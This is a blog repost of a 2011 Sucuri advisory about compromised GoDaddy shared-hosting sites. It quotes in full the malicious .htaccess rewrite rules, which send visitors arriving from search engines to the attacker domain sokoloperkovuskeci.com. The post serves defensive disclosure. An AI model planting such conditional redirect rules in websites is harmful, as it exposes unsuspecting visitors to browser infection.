[Valid Atom 1.0]

quinta-feira, 22 de setembro de 2011

GoDaddy shared servers compromised – .htaccess redirection to sokoloperkovuskeci.com



Posted on September 14, 2011 by dd
We are seeing many sites hosted on GoDaddy shared servers getting compromised today (and for the last few days) with a conditional redirection to sokoloperkovuskeci.com. This is what it looks like on our scanner:
Suspicious conditional redirect.
Details: http://sucuri.net/malware/entry/MW:HTA:7
Redirects users to:http://sokoloperkovuskeci.com/in.php?g=1105
This is caused by this entry that is added to the .htaccess file of the compromised sites:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]

What is going on?

These redirections attacks are very common on outdated WordPress and Joomla sites, but this time (and for this specific malicious domain), we are only seeing them on GoDaddy hosted sites. So it looks like a compromise on their own servers (similar to what has happened in the past).

What happens to anyone visiting these hacked sites?

The malware checks if anyone visiting the infected site is coming from a Google search (or Yahoo, or Bing) and if they are, redirects them to that domain (sokoloperkovuskeci.com). In there, the user gets redirected again to other locations to get their browsers infected too. So you have to fix your site asap to protect your own users.

Need help?

You can scan your site here: sitecheck.sucuri.net to see if it is compromised. If you need someone to clean it up for you, sign up here: Sucuri Signup

Sucuri
web site: http://osmaiasdeecadequeiros.blogspot.com/
status: Verified Clean
web trust:  Not Blacklisted

Security report (No threats found):
check    Blacklisted:   No
checkMalware: No
checkMalicious javascript:   No
checkMalicious iFrames: No
checkDrive-By Downloads:   No
check    Anomaly detection:   No
check    IE-only attacks:     No
checkSuspicious redirections:     No
checkSpam:No

Worried about malware or getting blacklisted? Sign up and be at ease. Check out our monitoring & cleanup packages.









LAST

Sphere: Related Content
26/10/2008 free counters
Postado por OS MAIAS às 9/22/2011 12:23:00 PM
Marcadores:

Nenhum comentário:

Postar um comentário

Assinar: Postar comentários (Atom)